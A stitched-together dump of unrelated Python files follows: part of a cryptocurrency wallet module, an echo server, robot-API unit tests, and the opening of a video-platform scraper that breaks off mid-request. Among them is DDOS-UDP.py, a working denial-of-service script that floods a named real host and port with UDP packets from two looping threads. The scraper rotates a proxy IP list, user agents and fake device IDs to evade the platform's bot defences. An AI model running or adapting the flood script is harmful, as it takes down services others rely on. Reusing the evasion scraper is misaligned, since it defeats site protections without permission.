def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
if self.storage.get('auto_maintain_gap', True):
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def __init__(self, storage):
super().__init__(storage)
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Slp_Standard_Wallet(Standard_Wallet):
wallet_type = 'slp_standard'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
return not any([not k.is_watching_only() for k in self.get_keystores()])
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'slp_standard', 'multisig', 'slp_multisig', 'imported', 'slp_imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'slp_standard': Slp_Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'slp_imported_privkey': Slp_ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
'slp_imported_addr': Slp_ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
# Convert 'bip39-slp' wallet type to 'slp_standard' wallet type
if storage.get('wallet_type', '') == 'bip39-slp' or storage.get('wallet_type', '') == 'standard_slp':
storage.put('wallet_type', 'slp_standard')
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
elif keystore.is_private_key_list(text,):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
DDOS-UDP.py
|
import socket
import time
import threading
MAX_CONNECT = 200
PORT = 8088
HOST = "dc.qdzx.net"
PAGE = "/"
buf = ("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE, HOST))
buf = buf.encode()
socks = []
def conn_thread(MAX_CONN=MAX_CONNECT):
global socks
for i in range(0, MAX_CONN):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.sendto(buf, (HOST, PORT))
print("[+] Send buf OK!,conn=%d\n" % i)
socks.append(s)
except Exception as ex:
print("[-] Could not connect to server or send error:%s" % ex)
time.sleep(0)
def send_thread():
global socks
while True:
for s in socks:
try:
s.sendto(buf, (HOST, PORT))
print("[+] send OK! %s" % s)
except Exception as ex:
print("[-] send Exception:%s\n" % ex)
# socks.remove(s)
# s.close()
time.sleep(0)
# sys.exit(0)
def run(host=HOST, times=200, page=PAGE, port=PORT):
global buf, MAX_CONNECT, PORT, HOST, PAGE
MAX_CONNECT = times
PORT = port
HOST = host
PAGE = page
buf = ("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 1000000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE, HOST))
buf = buf.encode()
conn_th = threading.Thread(target=conn_thread, args=())
send_th = threading.Thread(target=send_thread, args=())
conn_th.start()
send_th.start()
if __name__ == "__main__":
run(HOST, 200)
|
multi_echo_server.py
|
import socket
import time
from multiprocessing import Process
HOST = ""
PORT = 8001
BUFFER_SIZE = 1024
def handle_echo(addr,conn):
print("Connected by",addr)
echo_data = conn.recv(BUFFER_SIZE)
time.sleep(0.5)
conn.sendall(echo_data)
conn.shutdown(socket.SHUT_RDWR)
conn.close()
def main():
with socket.socket(socket.AF_INET,socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
s.bind((HOST,PORT))
s.listen(10)
while True:
conn,addr = s.accept()
p = Process(target = handle_echo,args = (addr,conn))
p.daemon = True
p.start()
print("start processing",p)
if __name__ =="__main__":
main()
|
test_zrobot_api.py
|
import os
import shutil
import tempfile
import time
import unittest
import uuid
from multiprocessing import Process
import pytest
from jumpscale import j
from zerorobot import config
from zerorobot import service_collection as scol
from zerorobot import template_collection as tcol
from zerorobot.dsl.ZeroRobotAPI import TemplateNotFoundError, ZeroRobotAPI
from zerorobot.dsl.ZeroRobotManager import ServiceCreateError
from zerorobot.robot import Robot
from zerorobot.service_proxy import ServiceProxy
from zerorobot.template.base import TemplateBase
class TestZRobotAPI(unittest.TestCase):
def __init__(self, methodName='runTest'):
super().__init__(methodName=methodName)
self.api = None
def _start_robot(self, id, with_tmpl=False):
def new(id, with_tmpl):
robot = Robot()
robot.set_data_repo(j.sal.fs.getTmpDirPath())
if with_tmpl:
robot.add_template_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
listen = "localhost:660%d" % int(id)
addr = "http://%s" % listen
robot.start(listen=listen, testing=True)
# return robot
addr = "http://localhost:660%d" % int(id)
p = Process(target=new, args=(id, with_tmpl))
p.start()
return p, addr
def setUp(self):
self.previous_zrobot_cfgs = {}
for instance in j.clients.zrobot.list():
self.previous_zrobot_cfgs[instance] = j.clients.zrobot.get(instance)
j.clients.zrobot.reset()
self.api = ZeroRobotAPI()
self.ps = []
self.instances = []
# start 2 robots
for i in range(2):
p, addr = self._start_robot(i, with_tmpl=True)
self.ps.append(p)
instance = "robot%d" % int(i)
cl = j.clients.zrobot.get(instance, data={'url': addr}, create=True)
cl.config.save()
self.instances.append(instance)
# give time to the robot to starts TODO: find better then sleep
time.sleep(1)
# make sure we don't have any service loaded
scol.drop_all()
# make sure we don't have any template loaded
tcol._templates = {}
def tearDown(self):
for p in self.ps:
p.terminate()
p.join()
for instance in self.instances:
j.clients.zrobot.delete(instance)
# TODO: cleanup data_dir of each robots
# make sure we don't have any service loaded
scol.drop_all()
# make sure we don't have any template loaded
tcol._templates = {}
# restore zrobot config
for instance, cl in self.previous_zrobot_cfgs.items():
cl = j.clients.zrobot.get(instance, data=cl.config.data, create=True)
cl.config.save()
def test_robots_discovery(self):
self.assertGreaterEqual(len(self.api.robots.list()), 2, "should have discovered at least the 2 robots that are running for the test")
for instance in self.instances:
self.assertIn(instance, self.api.robots.list())
def test_service_create_uid(self):
# make sure we don't have any template loaded in the current process
tcol._templates = {}
with self.assertRaises(TemplateNotFoundError, msg='trying to create a service from non handled template should raise '):
self.api.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node1')
# load template in current process
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
# now that we have some templates loaded, it should create a local service
node2 = self.api.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node2')
self.assertTrue(isinstance(node2, TemplateBase))
# the api should get all services from the local robot only
self.assertEqual(len(self.api.services.names), 1)
self.assertEqual(len(self.api.services.guids), 1)
# make sure remote robot doesn't have service created on them
for instance in self.api.robots.list():
robot = self.api.robots.get(instance)
self.assertEqual(len(robot.services.names), 0)
robot = self.api.robots.get('robot1')
node = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node3')
self.assertEqual(type(node), ServiceProxy, "service create on remote robot should return ServiceProxy")
self.assertEqual(len(robot.services.guids), 1)
# ensure we can access the remote service from the robot object
assert robot.services.names[node.name]
assert robot.services.guids[node.guid]
def test_service_create_name(self):
# make sure we don't have any template loaded in the current process
tcol._templates = {}
with self.assertRaises(TemplateNotFoundError, msg='trying to create a service from non handled template should raise '):
self.api.services.create("node", 'node1')
# load template in current process
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
# now that we have some templates loaded, it should create a local service
node2 = self.api.services.create("node", 'node2')
self.assertTrue(isinstance(node2, TemplateBase))
# the api should get all services from the local robot only
self.assertEqual(len(self.api.services.names), 1)
self.assertEqual(len(self.api.services.guids), 1)
# make sure remote robot doesn't have service created on them
for instance in self.api.robots.list():
robot = self.api.robots.get(instance)
self.assertEqual(len(robot.services.names), 0)
robot = self.api.robots.get('robot1')
node = robot.services.create("node", 'node3')
self.assertEqual(type(node), ServiceProxy, "service create on remote robot should return ServiceProxy")
self.assertEqual(len(robot.services.guids), 1)
# ensure we can access the remote service from the robot object
assert robot.services.names[node.name]
assert robot.services.guids[node.guid]
def test_service_create_validate_fail(self):
# make sure we don't have any template loaded in the current process
tcol._templates = {}
with self.assertRaises(TemplateNotFoundError, msg='trying to create a service from non handled template should raise '):
self.api.services.create("validate", 'service1')
# load template in current process
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
# try to create a service with wrong data, it should raise
robot = self.api.robots.get('robot1')
with pytest.raises(ServiceCreateError):
service = robot.services.create("validate", 'service1')
# create the same service with valid data, it should succeed
assert len(robot.services.find()) == 0
service = robot.services.create("validate", 'service1', {'required': True})
assert len(robot.services.find()) == 1
def test_service_search(self):
# load template in current process
with self.subTest(name='local'):
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
robot = self.api
self._test_search(self.api)
with self.subTest(name='remote'):
self._test_search(self.api.robots.get('robot1'))
def test_service_exists(self):
# load template in current process
with self.subTest(name='local'):
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
self._test_exists(self.api)
with self.subTest(name='remote'):
self._test_exists(self.api.robots.get('robot1'))
def test_service_get(self):
with self.subTest(name='local'):
# load template in current process
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
self._test_get(self.api)
with self.subTest(name='remote'):
self._test_get(self.api.robots.get('robot1'))
def test_service_find_or_create(self):
with self.subTest(name='local'):
# load template in current process
with tempfile.TemporaryDirectory(prefix="robotlocal") as tmpdir:
config.data_repo = config.DataRepo(tmpdir)
tcol.add_repo('http://github.com/threefoldtech/0-robot', directory='tests/fixtures/templates')
self._test_find_or_create(self.api)
with self.subTest(name='remote'):
self._test_find_or_create(self.api.robots.get('robot1'))
def _test_get(self, robot):
node1 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node1')
node2 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node2')
vm1 = robot.services.create("github.com/threefoldtech/0-robot/vm/0.0.1", 'vm1')
self.assertEqual(node1.guid, robot.services.get(name='node1').guid)
self.assertEqual(node2.guid, robot.services.get(name='node2').guid)
self.assertEqual(vm1.guid, robot.services.get(name='vm1').guid)
self.assertEqual(vm1.guid, robot.services.get(template_uid='github.com/threefoldtech/0-robot/vm/0.0.1').guid)
with self.assertRaises(scol.TooManyResults):
robot.services.get(template_host='github.com')
with self.assertRaises(scol.TooManyResults):
robot.services.get(template_account='threefoldtech')
with self.assertRaises(scol.TooManyResults):
robot.services.get(template_repo='0-robot')
with self.assertRaises(scol.TooManyResults):
robot.services.get(template_name='node')
with self.assertRaises(scol.TooManyResults):
robot.services.get(template_version='0.0.1')
with self.assertRaises(scol.ServiceNotFoundError):
self.assertFalse(robot.services.get(name='nan'))
with self.assertRaises(scol.ServiceNotFoundError):
self.assertFalse(robot.services.get(template_uid='github.com/threefoldtech/0-robot/node/1.1.0'))
with self.assertRaises(scol.ServiceNotFoundError):
self.assertFalse(robot.services.get(template_name='other'))
def _test_exists(self, robot):
node1 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node1')
node2 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node2')
vm1 = robot.services.create("github.com/threefoldtech/0-robot/vm/0.0.1", 'vm1')
self.assertTrue(robot.services.exists(name='node1'))
self.assertTrue(robot.services.exists(name='node2'))
self.assertTrue(robot.services.exists(name='vm1'))
self.assertTrue(robot.services.exists(template_uid='github.com/threefoldtech/0-robot/node/0.0.1'))
self.assertTrue(robot.services.exists(template_host='github.com'))
self.assertTrue(robot.services.exists(template_account='threefoldtech'))
self.assertTrue(robot.services.exists(template_repo='0-robot'))
self.assertTrue(robot.services.exists(template_name='node'))
self.assertTrue(robot.services.exists(template_version='0.0.1'))
self.assertFalse(robot.services.exists(name='nan'))
self.assertFalse(robot.services.exists(template_uid='github.com/threefoldtech/0-robot/node/1.1.0'))
self.assertFalse(robot.services.exists(template_name='other'))
def _test_search(self, robot):
node1 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node1')
node2 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node2')
vm1 = robot.services.create("github.com/threefoldtech/0-robot/vm/0.0.1", 'vm1')
results = robot.services.find(template_uid="github.com/threefoldtech/0-robot/node/0.0.1")
self.assertEqual(len(results), 2)
guids = [node1.guid, node2.guid]
for s in results:
self.assertIn(s.guid, guids)
results = robot.services.find(name='node1')
self.assertEqual(len(results), 1)
self.assertEqual(results[0].guid, node1.guid)
results = robot.services.find(template_version='0.0.1', template_name='node')
self.assertEqual(len(results), 2)
guids = [node1.guid, node2.guid]
for s in results:
self.assertIn(s.guid, guids)
def _test_find_or_create(self, robot):
node1 = robot.services.create("github.com/threefoldtech/0-robot/node/0.0.1", 'node1')
assert len(robot.services.guids) == 1
srv = robot.services.find_or_create(template_uid="github.com/threefoldtech/0-robot/node/0.0.1", service_name='node1', data={})
assert node1.guid == srv.guid, "find or create should return service if it exists"
assert len(robot.services.guids) == 1
srv = robot.services.find_or_create(template_uid="github.com/threefoldtech/0-robot/node/0.0.1", service_name='node2', data={})
assert node1.guid != srv.guid, "find or create should create a service if it doesn't exists"
assert len(robot.services.guids) == 2
|
KS_demo_4.0.py
|
import os
import re
import sys
import json
import time
import random
import requests
import threading
from queue import Queue
from PyQt5.QtWidgets import (QWidget, QLineEdit,QPushButton,QProgressBar,
QTextEdit, QGridLayout, QApplication)
from PyQt5.QtCore import QCoreApplication,pyqtSignal, QThread
cookie = ''
UA_WEB_LIST = [
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5"
]
UA_AND_LIST = [
"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; U; Android 7.1.1_r58; zh-cn; MI 6 Build/XPGCG5c067mKE4bJT2oz99wP491yRmlkbGVY2pJ8kELwnF9lCktxB2baBUrl3zdK) AppleWebKit/537.36 (KHTML, like Gecko)Version/4.0 MQQBrowser/9.9 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; U; Android 7.1.1_r58; zh-cn; R7Plusm Build/hccRQFbhDEraf5B4M760xBeyYwaxH0NjeMsOymkoLnr31TcAhlqfd2Gl8XGdsknO) AppleWebKit/537.36 (KHTML, like Gecko)Version/4.0 MQQBrowser/9.9 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; Android 9; BLA-AL00 Build/HUAWEIBLA-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.15.0 baiduboxapp/11.19.5.10 (Baidu; P1 9)",
"Mozilla/5.0 (Linux; U; Android 8.1.0; zh-cn; BLA-AL00 Build/HUAWEIBLA-AL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/8.9 Mobile Safari/537.36",
"Mozilla/5.0 (Linux; U; Android 7.1.2; zh-cn; Redmi 5 Plus Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.141 Mobile Safari/537.36 XiaoMi/MiuiBrowser/11.7.34",
]
DID_WEB_LIST = [
'web_f59491427f0ea183ee1975de99ae1718',
# 'web_ce554296508e5eac12616081c75f8a27',
# 'web_027b3637f2aef14cbd14bbf93f50bd4a'
]
DID_AND_LIST = [
'ANDROID_e0e0ef947bbbc243',
'ANDROID_1dfef527abefe8c7',
'ANDROID_5518a3747864010b',
'ANDROID_25c32123fd766e1e',
'ANDROID_600b23d707697df0',
'ANDROID_e1b34c4ac9ddf120',
'ANDROID_773c33a642ac1845',
'ANDROID_6a615c268d9dc8d3',
'ANDROID_c45e742737e83499',
'ANDROID_c94d28153912d19a',
'ANDROID_9ba4839bf09a1834',
'ANDROID_066f7438a673e208'
]
IP_LIST = [
{"ip": "222.85.28.130", "port": "52590", "type": "HTTP"},
{"ip": "223.199.27.86", "port": "9999", "type": "HTTP"},
{"ip": "36.248.132.198", "port": "9999", "type": "HTTP"},
{"ip": "175.42.123.196", "port": "9999", "type": "HTTP"},
{"ip": "113.195.168.32", "port": "9999", "type": "HTTP"},
{"ip": "119.108.165.153", "port": "9000", "type": "HTTP"},
{"ip": "175.42.158.224", "port": "9999", "type": "HTTP"},
{"ip": "125.108.114.170", "port": "9000", "type": "HTTP"},
{"ip": "171.35.169.101", "port": "9999", "type": "HTTP"},
{"ip": "180.118.128.55", "port": "9000", "type": "HTTP"},
{"ip": "125.108.79.254", "port": "9000", "type": "HTTP"},
{"ip": "113.194.130.100", "port": "9999", "type": "HTTP"},
{"ip": "110.243.27.195", "port": "9999", "type": "HTTP"},
{"ip": "115.218.214.35", "port": "9000", "type": "HTTP"},
{"ip": "125.123.152.114", "port": "3000", "type": "HTTP"},
{"ip": "61.164.39.66", "port": "53281", "type": "HTTP"},
{"ip": "123.55.98.144", "port": "9999", "type": "HTTP"},
{"ip": "122.138.141.174", "port": "9999", "type": "HTTP"},
{"ip": "119.254.94.93", "port": "44665", "type": "HTTP"},
{"ip": "123.163.27.226", "port": "9999", "type": "HTTP"},
{"ip": "171.35.170.105", "port": "9999", "type": "HTTP"},
{"ip": "136.228.128.6", "port": "43117", "type": "HTTP"},
{"ip": "36.249.48.23", "port": "9999", "type": "HTTP"},
{"ip": "113.195.21.9", "port": "9999", "type": "HTTP"},
{"ip": "125.108.73.239", "port": "9000", "type": "HTTP"},
{"ip": "120.83.107.11", "port": "9999", "type": "HTTP"},
{"ip": "175.43.156.39", "port": "9999", "type": "HTTP"},
{"ip": "220.249.149.68", "port": "9999", "type": "HTTP"},
{"ip": "113.195.18.104", "port": "9999", "type": "HTTP"},
{"ip": "163.125.30.227", "port": "8118", "type": "HTTP"}
]
PROFILE_URL = "https://live.kuaishou.com/profile/"
DATA_URL = "https://live.kuaishou.com/m_graphql"
WORK_URL = "https://m.gifshow.com/fw/photo/"
USER_ITEM = {}
#后台爬虫
class spider_ks():
__headers_web = {
'accept': '*/*',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
'Connection': 'keep-alive',
'Content-Type': 'application/json',
'Host': 'live.kuaishou.com',
'Origin': 'https://live.kuaishou.com',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': '',
'Cookie': ''
}
__headers_and = {
'User-Agent': '',
'cookie': ''
}
__crawl_list = []
def __init__(self,satar_url,cookie):
self.__cookie = cookie
self.satar_url = ''.join(satar_url.split('\n')).strip()
self.user_id = None
self.__crawl_list.append(self.satar_url)
self.q_works = Queue()
# 1.爬虫起始
def spider_start(self):
print("准备开始爬取,共有%d个用户..." % len(self.__crawl_list))
for surl in self.__crawl_list:
self.get_user(surl)
return True
# 2.爬取用户个人信息以及作品列表
def get_user(self, surl):
proxy_ = random.choice(IP_LIST)
proxies = {'{}'.format(proxy_['type']): '{0}:{1}'.format(proxy_['ip'], proxy_['port'])}
self.__headers_web['User-Agent'] = random.choice(UA_WEB_LIST)
self.__headers_web['Cookie'] = 'did=' + random.choice(DID_WEB_LIST)
response = requests.get(surl)
if '/profile/' not in response.request.url:
uid = response.request.url.split('?')[0].split('/')[-2]
vid = response.request.url.split('?')[0].split('/')[-1]
dir_name = './data/'
if not os.path.exists(dir_name):
os.makedirs(dir_name)
self.get_video_url(uid,vid,dir_name)
return
uid = response.request.url.split('/profile/')[-1].split('?')[0]
self.user_id = uid
# 获取用户个人信息
payload = {"operationName": "privateFeedsQuery",
"variables": {"principalId": uid, "pcursor": "", "count": 999},
